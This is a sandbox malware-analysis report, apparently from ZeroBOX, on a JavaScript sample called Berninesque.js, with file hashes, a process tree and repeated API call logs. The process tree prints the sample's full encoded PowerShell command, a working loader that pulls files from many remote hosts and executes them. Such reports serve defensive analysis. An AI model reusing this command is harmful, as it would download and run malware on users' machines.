popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Berninesque.js

Generic Malware Antivirus Hide_URL AntiDebug AntiVM PowerShell
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 May 24, 2023, 4:58 p.m. May 24, 2023, 5 p.m.
Size 231.6KB
Type ASCII text, with very long lines, with CRLF line terminators
MD5 afd901a05b3501b938b9e78d48e1f5e3
SHA256 04d8c93ca76faf5b2033414573de8422f2233f9292328fb3f5da800beca73e08
CRC32 7A7C61E2
ssdeep 3072:0ipNtzYMGxJBdjOlGEfCy3IA6QHddDAZAGZjaOu4PseK8LICgJDA3Um:3NxGPBd6XCkIAd+VpEYICgJ4
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Berninesque.js

    1636

    • wscript.exe "C:\Windows\System32\wscript.exe" "C:\ProgramData\ConvenerCushaw.js" Deforces Unextorted Unfaceted Lophotriaene

      2504

      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABBAGwAbQBzAGcAaQB2AGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AQQBBAHgAQQBDADQAQQBNAFEAQQAwAEEARABZAEEATABnAEEAeQBBAEQAVQBBAE4AQQBBAHUAQQBEAGsAQQBPAEEAQQA9AEYAZQBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAVQBBAGIAZwBCADAAQQBHAFUAQQBiAFEAQgB3AEEASABRAEEAYQBRAEIAaQBBAEcAdwBBAGUAUQBBAHUAQQBHADQAQQBaAFEAQgAwAEEASABjAEEAYgB3AEIAeQBBAEcAcwBBAEYAZQBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAFoAUQBCADAAQQBHAEUAQQBjAGcAQgA1AEEAQwA0AEEAYgBnAEIAcwBBAEEAPQA9AEYAZQBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAbABBAEcAdwBBAGEAUQBCAHQAQQBHAGsAQQBiAGcAQgBoAEEARwA0AEEAZABBAEEAdQBBAEcAawBBAGQAQQBBAD0AIgA7ACQAcAByAGUAZABpAHMAYwBvAHYAZQByAHkAVQBuAG0AYQByAHIAaQBhAGcAZQBhAGIAbABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABnAEEATgBnAEEAdQBBAEQARQBBAE0AdwBBAHoAQQBDADQAQQBNAGcAQQB4AEEARABZAEEATABnAEEANQBBAEQAVQBBACIAOwAkAGkAbgB0AG8AeABpAGMAYQB0AGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGMAQQBjAGcAQgBoAEEARwA0AEEAYgBnAEIAcABBAEcAVQBBAGMAdwBCAFEAQQBHAEUAQQBjAGcAQgBoAEEASABBAEEAYQBBAEIAeQBBAEcARQBBAGMAdwBCAHAAQQBIAE0AQQBkAEEAQQB1AEEASABBAEEAYgBBAEIAMQBBAEgATQBBAHYASABBAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE8AUQBBAHUAQQBEAFkAQQBNAEEAQQB1AEEARABRAEEATQBRAEEAdQBBAEQARQBBAE4AQQBBADIAQQBBAD0APQB2AEgAQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFQAQQBIAFUAQQBZAGcAQgAwAEEARwBrAEEAZABBAEIAcwBBAEcAawBBAGIAZwBCAG4AQQBFAFUAQQBlAEEAQgAwAEEASABVAEEAYwB3AEIAcABBAEcAOABBAGIAZwBBAHUAQQBHAE0AQQBZAFEAQgB3AEEARwBVAEEAZABBAEIAdgBBAEgAYwBBAGIAZwBBAD0AdgBIAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBsAEEARwA0AEEAYQBnAEIAdgBBAEgAawBBAGEAUQBCAHUAQQBHAGMAQQBiAEEAQgA1AEEAQwA0AEEAWgBnAEIAeQBBAEEAPQA9ACIAOwAkAGUAZABlAG8AbABvAGcAeQBDAG8AbgBuAG8AdABhAHQAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQAQQBBAE8AQQBBAHUAQQBEAEkAQQBOAEEAQQAzAEEAQwA0AEEATwBRAEEAMwBBAEMANABBAE4AQQBBAHoAQQBDADgAQQBjAFEAQgBrAEEARgBBAEEATAB3AEIAMwBBAEUAWQBBAEoAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBRAEEAdQBBAEQASQBBAE0AdwBBADIAQQBDADQAQQBNAFEAQQAwAEEAQwA0AEEATQBRAEEAMwBBAEQAawBBAEwAdwBCAEUAQQBHAFUAQQBhAHcAQgBQAEEARgBBAEEAWgB3AEEAdgBBAEQAYwBBAFoAZwBCAGkAQQBFAE0AQQBlAFEAQgBoAEEASABRAEEAVABBAEIANQBBAEEAPQA9AEoAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE0AZwBBAHgAQQBDADQAQQBNAFEAQQAzAEEAQwA0AEEATwBRAEEAeQBBAEMAOABBAFMAZwBCAFUAQQBHAGsAQQBMAHcAQgAwAEEARgBvAEEAYgBnAEIAcABBAEUAVQBBAFIAZwBBAD0ASgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AUQBBADMAQQBDADQAQQBOAGcAQQA0AEEAQwA4AEEATwBRAEIARABBAEcAMABBAE8AUQBCAEYAQQBGAGMAQQBMAHcAQgBKAEEARQBNAEEAVgB3AEEAdwBBAEcAYwBBAE8AUQBCAFMAQQBFAHMAQQBRAFEAQgBMAEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAYwBsAGEAeQBvAHEAdQBvAHQAWABpAHAAaABvAHMAdQByAGUAIABpAG4AIAAkAGUAZABlAG8AbABvAGcAeQBDAG8AbgBuAG8AdABhAHQAZQAgAC0AcwBwAGwAaQB0ACAAIgBKACIAKQAgAHsAJABDAGgAYQByAGkAbAB5AEMAbwByAG4AaQB4ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABBAEEATQBRAEEAdQBBAEQARQBBAE0AdwBBAHoAQQBDADQAQQBNAGcAQQB3AEEARABJAEEATABnAEEAeABBAEQAWQBBAE4AUQBBAD0ASQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAFEAQQB5AEEAQwA0AEEATQBnAEEAegBBAEQAZwBBAEwAZwBBAHgAQQBEAGcAQQBOAHcAQQB1AEEARABFAEEATQBRAEEAMABBAEEAPQA9ACIAOwAkAEIAbwBuAHoAZQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBBAEEAdQBBAEQASQBBAE4AQQBBAHgAQQBDADQAQQBNAFEAQQAyAEEARABRAEEATABnAEEAeABBAEQASQBBAE0AZwBBAD0AdgBmAFcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAxAEEARABjAEEATABnAEEANABBAEQAQQBBAEwAZwBBADAAQQBEAFUAQQBMAGcAQQB4AEEARABrAEEATgBBAEEAPQB2AGYAVwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEUAQQBiAGcAQgB1AEEARwBVAEEAWQB3AEIAMABBAEcARQBBAGIAZwBCADAAQQBFAGsAQQBaAEEAQgBwAEEARwA4AEEAWQB3AEIAbwBBAEgASQBBAGIAdwBCAHQAQQBHADgAQQBjAHcAQgB2AEEARwAwAEEAWgBRAEEAdQBBAEcAVQBBAGMAdwBCADAAQQBHAEUAQQBkAEEAQgBsAEEAQQA9AD0AIgA7AHQAcgB5ACAAewAkAFUAbgBzAGkAbgBnAGwAZQBuAGUAcwBzAEIAbwBuAHMAcABpAGUAbABzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAxAEEARABFAEEATABnAEEAeQBBAEQAUQBBAE4AQQBBAHUAQQBEAFEAQQBNAFEAQQB1AEEARABJAEEATQB3AEEAMABBAEEAPQA9AFoAcQBDAD0AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBOAEEARwBVAEEAYwB3AEIAaABBAEcAdwBBAGIAQQBCAHAAQQBHAEUAQQBiAGcAQgBqAEEARwBVAEEATABnAEIAdwBBAEcAawBBAFkAdwBCAHoAQQBBAD0APQAiADsAJAB1AG4AZABlAHIAdABlAGEAbQBlAGQAQwBpAHQAaQBlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEkAQQBHAFUAQQBkAEEAQgBsAEEASABJAEEAYgB3AEIANABBAEcAVQBBAGIAZwBCAHYAQQBIAFUAQQBjAHcAQQB1AEEARwBZAEEAWQBRAEIAcABBAEcAdwBBAEgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABFAEEATgB3AEEAdQBBAEQASQBBAE0AZwBBAHgAQQBDADQAQQBPAEEAQQAzAEEAQwA0AEEATQBnAEEAdwBBAEQAVQBBAEgAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBRAEEAMQBBAEMANABBAE0AUQBBAHkAQQBEAEUAQQBMAGcAQQA1AEEARABJAEEATABnAEEAeABBAEQARQBBAE8AUQBBAD0AIgA7ACQAVQBuAGMAbwBuAHQAZQBtAHAAbABhAHQAaQB2AGUAbgBlAHMAcwBEAGUAYwBhAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABjAGwAYQB5AG8AcQB1AG8AdABYAGkAcABoAG8AcwB1AHIAZQApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAFUAbgBjAG8AbgB0AGUAbQBwAGwAYQB0AGkAdgBlAG4AZQBzAHMARABlAGMAYQBkAGUAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbABhAG0AaQBuAGEAdABpAG8AbgAuAHUAbgBuAGEAaQB2AGUAbAB5ADsAJABQAG8AbAB5AHIAaAB5AHQAaABtAGkAYwBhAGwAbAB5AFMAdQBwAGUAcgBjAGEAcAB0AGkAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBVAEEASABJAEEAWQBRAEIAdABBAEcAVQBBAGIAQQBCAHMAQQBDADQAQQBZAHcAQgBoAEEARwBZAEEAWgBRAEEAPQBPAHQAUwBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAQwBBAEcAOABBAGIAZwBCAGwAQQBHAEUAQQBZAHcAQgBvAEEARwBVAEEATABnAEIAegBBAEgAUQBBAE8AdABTAGEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABZAEEATQB3AEEAdQBBAEQASQBBAE0AdwBBAHoAQQBDADQAQQBNAGcAQQB6AEEARABVAEEATABnAEEAeQBBAEQAQQBBAE4AdwBBAD0ATwB0AFMAYQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFUAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAMQBBAEMANABBAE0AZwBBAHkAQQBEAEUAQQBMAGcAQQAzAEEARABZAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbABhAG0AaQBuAGEAdABpAG8AbgAuAHUAbgBuAGEAaQB2AGUAbAB5ACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAAMgA1ADMAOQA5ADMAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEAUgBBAEIAaABBAEgAUQBBAFkAUQBCAGMAQQBHAHcAQQBZAFEAQgB0AEEARwBrAEEAYgBnAEIAaABBAEgAUQBBAGEAUQBCAHYAQQBHADQAQQBMAGcAQgAxAEEARwA0AEEAYgBnAEIAaABBAEcAawBBAGQAZwBCAGwAQQBHAHcAQQBlAFEAQQBzAEEASABZAEEAYQBRAEIAdwBBAEgATQBBAE8AdwBCAE4AQQBFAGsAQQBWAEEAQgBNAEEARwBrAEEAWQB3AEIAbABBAEcANABBAGMAdwBCAGwAQQBBAD0APQAiADsAJABFAG4AcwBpAGUAbgB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQB3AEEANQBBAEMANABBAE0AUQBBAHcAQQBEAGMAQQBMAGcAQQB4AEEARABVAEEATwBBAEEAdQBBAEQASQBBAE0AUQBBADIAQQBBAD0APQB6AFAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABRAEEAYQBBAEIAMQBBAEcAMABBAFkAZwBCAGwAQQBIAEkAQQBVAEEAQgA1AEEASABJAEEAYgB3AEIANABBAEgAawBBAGIAQQBCAGwAQQBDADQAQQBZAHcAQgB1AEEAQQA9AD0AegBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIATgBBAEcAawBBAFkAUQBCADYAQQBHAGsAQQBiAGcAQgBsAEEAQwA0AEEAWgB3AEIAeQBBAEcARQBBAGMAQQBCAG8AQQBHAGsAQQBZAHcAQgB6AEEAQQA9AD0AegBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE4AQQBBADAAQQBDADQAQQBNAFEAQQAwAEEARABBAEEATABnAEEAeABBAEQATQBBAE0AZwBBAHUAQQBEAEkAQQBNAGcAQQB3AEEAQQA9AD0AIgA7ACQAdgBpAGEAYgBpAGwAaQB0AGkAZQBzAEQAZQBuAHMAaABlAHIAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEkAQQBNAEEAQQA1AEEAQwA0AEEATQBRAEEAMgBBAEQAVQBBAEwAZwBBAHkAQQBEAFUAQQBNAHcAQQB1AEEARABnAEEATQBBAEEAPQBJAGIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBNAEEAYgBBAEIAcABBAEcANABBAGEAdwBCAHAAQQBHAFUAQQBjAGcAQQB1AEEARwBZAEEAZQBRAEIAcABBAEEAPQA9AEkAYgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEYAQQBHADQAQQBhAEEAQgBsAEEASABJAEEAYQBRAEIAMABBAEcARQBBAGIAZwBCAGoAQQBHAFUAQQBMAGcAQgBqAEEARwA0AEEASQBiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAVQBBAE0AUQBBAHUAQQBEAEUAQQBNAEEAQQB6AEEAQwA0AEEATQBRAEEANQBBAEQAYwBBAEwAZwBBAHgAQQBEAFkAQQBPAFEAQQA9ACIAOwAkAFQAbwByAG4AYQBkAGEAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQAwAEEAQwA0AEEATQBnAEEAeABBAEQATQBBAEwAZwBBAHgAQQBEAEEAQQBOAFEAQQB1AEEARABFAEEATgBBAEEAeABBAEEAPQA9AGYAZgBEAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGIAdwBCAHoAQQBIAFEAQQBaAFEAQgB5AEEARwBrAEEAYgB3AEIAeQBBAEcAawBBAFQAUQBCADUAQQBIAFEAQQBhAEEAQgB2AEEASABBAEEAYgB3AEIAbABBAEgAUQBBAGEAUQBCADYAQQBHAFUAQQBMAGcAQgBqAEEARwB3AEEAZABRAEIAaQBBAEEAPQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AIABjAGEAdABjAGgAIAB7ACQAQQB1AGMAdABvAHIAaQBhAGwAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAHcAQQAwAEEAQwA0AEEATQBRAEEAMwBBAEQAVQBBAEwAZwBBAHkAQQBEAEEAQQBOAEEAQQB1AEEARABFAEEATwBBAEEANABBAEEAPQA9AD0AdQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGMAQQBaAFEAQgB6AEEASABRAEEAYQBRAEIAagBBAEgAVQBBAGIAQQBCAGgAQQBHAE0AQQBhAFEAQgB2AEEASABVAEEAYwB3AEEAdQBBAEcAMABBAGIAdwBCAHkAQQBIAFEAQQBaAHcAQgBoAEEARwBjAEEAWgBRAEEAPQA9AHUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBUAEEARwB3AEEAYQBRAEIAMABBAEgAYwBBAGIAdwBCAHkAQQBHAHMAQQBMAGcAQgB0AEEARwBFAEEAYwBnAEIAcgBBAEcAVQBBAGQAQQBCAHAAQQBHADQAQQBaAHcAQQA9AD0AdQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAE0AQQBMAGcAQQB4AEEARABRAEEATgBRAEEAdQBBAEQASQBBAE0AQQBBAHkAQQBDADQAQQBNAFEAQQB3AEEARABBAEEAIgA7ACQAZQBlAHIAbwBjAGsAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEEAQQBPAFEAQQB1AEEARABJAEEATQBBAEEAMwBBAEMANABBAE0AUQBBAHoAQQBEAE0AQQBMAGcAQQB4AEEARABFAEEATgBRAEEAPQBsAGEAZQBNAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE4AdwBBAHUAQQBEAEUAQQBOAHcAQQAxAEEAQwA0AEEATgBBAEEAeABBAEMANABBAE0AUQBBAHoAQQBEAFkAQQBsAGEAZQBNAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARwBBAEcARQBBAGEAUQBCADAAQQBHAGcAQQBkAHcAQgB2AEEASABJAEEAZABBAEIAbwBBAEcAawBBAGIAZwBCAGwAQQBIAE0AQQBjAHcAQgBGAEEASABVAEEAWQB3AEIAbwBBAEgASQBBAGIAdwBCAHQAQQBHAEUAQQBkAEEAQgBwAEEARwA0AEEATABnAEIANgBBAEcAOABBAGIAZwBCAGwAQQBBAD0APQAiADsAJABuAGUAbwB0AGUAcgBpAGMAYQBsAGwAeQBQAHIAbwBiAGwAZQBtAGEAdABpAHMAdAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIASwBBAEcARQBBAFkAdwBCAGgAQQBIAEkAQQBZAFEAQgB1AEEARwBRAEEAWQBRAEEAdQBBAEcASQBBAGEAUQBCAHYAQQBBAD0APQBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdABBAEgAVQBBAGMAdwBCAHAAQQBHAE0AQQBZAFEAQgBzAEEARwB3AEEAZQBRAEEAdQBBAEcAawBBAGIAUQBBAD0ATwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFkAQQBPAEEAQQB1AEEARABVAEEATQBRAEEAdQBBAEQAVQBBAE4AQQBBAHUAQQBEAEkAQQBOAEEAQQA0AEEAQQA9AD0AIgA7AH0AfQAkAG8AdAB0AG8AbQBhAG4AbABpAGsAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdwBBAEcAZwBBAGUAUQBCAHoAQQBHAGsAQQBjAFEAQgAxAEEARwBVAEEATABnAEIAMgBBAEcAVQBBAFoAdwBCAGgAQQBIAE0AQQAiADsAJABTAHAAbABpAGMAZQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBqAEEASABVAEEAYgBRAEIAcABBAEcANABBAFkAUQBCAHMAQQBDADQAQQBjAHcAQgBoAEEARwB3AEEAWgBRAEEAPQBvAEgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBRAEEARwBVAEEAYgBnAEIAaABBAEcANABBAFkAdwBCAGwAQQBIAEkAQQBVAHcAQgBsAEEASABBAEEAZABRAEIAcwBBAEgAUQBBAEwAZwBCAG4AQQBHADAAQQBZAGcAQgBvAEEAQQA9AD0AbwBIAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAYwBBAFkAUQBCAHoAQQBIAEEAQQBhAFEAQgB6AEEARwBnAEEAYgBBAEIANQBBAEUATQBBAGEAQQBCAHkAQQBHAGsAQQBjAHcAQgAwAEEARwBrAEEAWQBRAEIAdQBBAEcAOABBAFoAdwBCAGwAQQBHADQAQQBkAEEAQgBwAEEARwB3AEEAYQBRAEIAegBBAEcAMABBAEwAZwBCAGgAQQBIAEkAQQBiAFEAQgA1AEEAQQA9AD0AbwBIAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAGQAUQBCAHMAQQBHADAAQQBiAHcAQgB1AEEARwBVAEEAWQB3AEIAMABBAEcAOABBAGIAUQBCADUAQQBGAFUAQQBiAGcAQgB6AEEASABrAEEAYgBRAEIAaQBBAEcAOABBAGIAQQBCAHAAQQBHAE0AQQBZAFEAQgBzAEEAQwA0AEEAWQB3AEIAbwBBAEgASQBBAGEAUQBCAHoAQQBIAFEAQQBiAFEAQgBoAEEASABNAEEAIgA7ACQAVwBvAHIAcgBpAGMAbwB3ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBZAEEAYgBBAEIAdgBBAEgASQBBAGEAUQBCAGsAQQBHAFUAQQBZAFEAQgB1AEEAQwA0AEEAYgBBAEIAdgBBAEcARQBBAGIAZwBBAD0AIgA7AA=="

        236

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004886e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00488420
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00488420
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00488420
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00488020
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00488020
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00488020
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00488020
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00488020
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00488020
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00487b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00487b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00487b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00488620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00488620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00488620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004881e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00488620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00488620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00488620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00488620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00488620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00488620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00488620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004884e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004884e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004884e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004884e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004884e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004884e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004884e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004884e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004884e0
flags: 0
crypto_export_handle: 0x00000000
